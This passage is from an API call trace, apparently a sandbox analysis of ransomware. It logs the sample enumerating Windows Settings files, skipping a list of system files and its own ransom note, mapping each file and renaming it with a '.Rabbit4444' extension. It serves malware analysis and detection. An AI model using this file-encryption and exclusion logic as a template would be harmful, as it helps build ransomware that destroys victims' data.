Size=0x208) returned 0x124d90 [0056.774] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0056.775] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.775] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0056.775] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14808533313) returned 1 [0056.775] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0056.775] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0056.775] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.775] CloseHandle (hObject=0x298) returned 1 [0056.775] CloseHandle (hObject=0x278) returned 1 [0056.775] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyContacts.settingcontent-ms.Rabbit4444") returned 177 [0056.775] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyContacts.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacycontacts.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyContacts.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacycontacts.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.776] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d92be, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x99d92be, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2391d733, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x467, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPagePrivacyCustomPeripherals.settingcontent-ms", cAlternateFileName="AA090F~1.SET")) returned 1 [0056.776] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyCustomPeripherals.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.776] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyCustomPeripherals.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.776] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyCustomPeripherals.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.776] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyCustomPeripherals.settingcontent-ms", lpString2=".") returned 1 [0056.776] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyCustomPeripherals.settingcontent-ms", lpString2="..") returned 1 [0056.776] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyCustomPeripherals.settingcontent-ms", lpString2="windows") returned -1 [0056.776] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyCustomPeripherals.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.776] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyCustomPeripherals.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.776] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyCustomPeripherals.settingcontent-ms", lpString2="boot") returned -1 [0056.776] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyCustomPeripherals.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.776] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyCustomPeripherals.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.776] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPagePrivacyCustomPeripherals.settingcontent-ms" | out: lpString1="AAA_SettingsPagePrivacyCustomPeripherals.settingcontent-ms") returned="AAA_SettingsPagePrivacyCustomPeripherals.settingcontent-ms" [0056.776] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyCustomPeripherals.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.776] lstrlenW (lpString="AAA_SettingsPagePrivacyCustomPeripherals.settingcontent-ms") returned 58 [0056.776] lstrlenW (lpString="Rabbit4444") returned 10 [0056.776] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.776] lstrlenW (lpString=".dll") returned 4 [0056.776] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.776] lstrlenW (lpString=".lnk") returned 4 [0056.776] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.776] lstrlenW (lpString=".ini") returned 4 [0056.776] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.776] lstrlenW (lpString=".sys") returned 4 [0056.776] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.776] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyCustomPeripherals.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacycustomperipherals.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.777] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.777] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14808747708) returned 1 [0056.777] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1127) returned 1 [0056.777] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0056.777] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0056.777] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x770, lpName=0x0) returned 0x298 [0056.778] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x770) returned 0x70000 [0056.779] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.779] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0056.779] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.779] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0056.779] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.779] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0056.779] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.779] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0056.779] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14809012868) returned 1 [0056.779] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0056.779] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0056.779] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.780] CloseHandle (hObject=0x298) returned 1 [0056.780] CloseHandle (hObject=0x278) returned 1 [0056.780] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyCustomPeripherals.settingcontent-ms.Rabbit4444") returned 186 [0056.780] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyCustomPeripherals.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacycustomperipherals.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyCustomPeripherals.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacycustomperipherals.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.780] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9cfa4fd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x9cfa4fd, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2394398e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x42b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPagePrivacyEmail.settingcontent-ms", cAlternateFileName="AA7C3F~1.SET")) returned 1 [0056.780] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyEmail.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.780] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyEmail.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.781] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyEmail.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.781] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyEmail.settingcontent-ms", lpString2=".") returned 1 [0056.781] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyEmail.settingcontent-ms", lpString2="..") returned 1 [0056.781] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyEmail.settingcontent-ms", lpString2="windows") returned -1 [0056.781] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyEmail.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.781] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyEmail.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.781] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyEmail.settingcontent-ms", lpString2="boot") returned -1 [0056.781] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyEmail.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.781] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyEmail.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.781] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPagePrivacyEmail.settingcontent-ms" | out: lpString1="AAA_SettingsPagePrivacyEmail.settingcontent-ms") returned="AAA_SettingsPagePrivacyEmail.settingcontent-ms" [0056.781] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyEmail.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.781] lstrlenW (lpString="AAA_SettingsPagePrivacyEmail.settingcontent-ms") returned 46 [0056.781] lstrlenW (lpString="Rabbit4444") returned 10 [0056.781] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.781] lstrlenW (lpString=".dll") returned 4 [0056.781] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.781] lstrlenW (lpString=".lnk") returned 4 [0056.781] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.781] lstrlenW (lpString=".ini") returned 4 [0056.781] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.781] lstrlenW (lpString=".sys") returned 4 [0056.781] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.781] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyEmail.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacyemail.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.782] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.782] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14809239061) returned 1 [0056.782] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1067) returned 1 [0056.782] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0056.782] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0056.782] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x730, lpName=0x0) returned 0x298 [0056.786] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x730) returned 0x70000 [0056.786] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.786] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0056.786] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.787] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0056.787] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.787] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0056.787] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.787] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0056.787] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14809767293) returned 1 [0056.787] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0056.787] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0056.787] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.787] CloseHandle (hObject=0x298) returned 1 [0056.787] CloseHandle (hObject=0x278) returned 1 [0056.787] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyEmail.settingcontent-ms.Rabbit4444") returned 174 [0056.787] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyEmail.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacyemail.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyEmail.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacyemail.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.788] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e2b7e4, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x9e2b7e4, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a0254b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x435, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPagePrivacyGeneral.settingcontent-ms", cAlternateFileName="AA9864~1.SET")) returned 1 [0056.788] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyGeneral.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.788] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyGeneral.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.788] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyGeneral.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.788] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyGeneral.settingcontent-ms", lpString2=".") returned 1 [0056.788] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyGeneral.settingcontent-ms", lpString2="..") returned 1 [0056.788] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyGeneral.settingcontent-ms", lpString2="windows") returned -1 [0056.788] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyGeneral.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.788] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyGeneral.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.788] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyGeneral.settingcontent-ms", lpString2="boot") returned -1 [0056.788] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyGeneral.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.788] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyGeneral.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.788] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPagePrivacyGeneral.settingcontent-ms" | out: lpString1="AAA_SettingsPagePrivacyGeneral.settingcontent-ms") returned="AAA_SettingsPagePrivacyGeneral.settingcontent-ms" [0056.788] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyGeneral.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.789] lstrlenW (lpString="AAA_SettingsPagePrivacyGeneral.settingcontent-ms") returned 48 [0056.789] lstrlenW (lpString="Rabbit4444") returned 10 [0056.789] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.789] lstrlenW (lpString=".dll") returned 4 [0056.789] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.789] lstrlenW (lpString=".lnk") returned 4 [0056.789] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.789] lstrlenW (lpString=".ini") returned 4 [0056.789] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.789] lstrlenW (lpString=".sys") returned 4 [0056.789] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.789] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyGeneral.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacygeneral.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.789] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.789] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14809992274) returned 1 [0056.789] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1077) returned 1 [0056.789] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0056.789] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0056.789] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x740, lpName=0x0) returned 0x298 [0056.790] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x740) returned 0x70000 [0056.791] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.791] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0056.791] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.791] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0056.791] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.792] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0056.792] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.792] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0056.792] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14810246860) returned 1 [0056.792] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0056.792] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0056.792] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.792] CloseHandle (hObject=0x298) returned 1 [0056.792] CloseHandle (hObject=0x278) returned 1 [0056.792] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyGeneral.settingcontent-ms.Rabbit4444") returned 176 [0056.792] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyGeneral.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacygeneral.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyGeneral.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacygeneral.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.793] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3080eb, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xb3080eb, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x239b6099, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x43a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPagePrivacyLocation.settingcontent-ms", cAlternateFileName="AAD632~1.SET")) returned 1 [0056.793] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyLocation.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.793] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyLocation.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.793] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyLocation.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.793] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyLocation.settingcontent-ms", lpString2=".") returned 1 [0056.793] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyLocation.settingcontent-ms", lpString2="..") returned 1 [0056.793] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyLocation.settingcontent-ms", lpString2="windows") returned -1 [0056.793] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyLocation.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.793] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyLocation.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.793] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyLocation.settingcontent-ms", lpString2="boot") returned -1 [0056.793] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyLocation.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.793] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyLocation.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.793] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPagePrivacyLocation.settingcontent-ms" | out: lpString1="AAA_SettingsPagePrivacyLocation.settingcontent-ms") returned="AAA_SettingsPagePrivacyLocation.settingcontent-ms" [0056.793] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyLocation.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.793] lstrlenW (lpString="AAA_SettingsPagePrivacyLocation.settingcontent-ms") returned 49 [0056.793] lstrlenW (lpString="Rabbit4444") returned 10 [0056.793] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.794] lstrlenW (lpString=".dll") returned 4 [0056.794] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.794] lstrlenW (lpString=".lnk") returned 4 [0056.794] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.794] lstrlenW (lpString=".ini") returned 4 [0056.794] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.794] lstrlenW (lpString=".sys") returned 4 [0056.794] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.794] CreateFileW 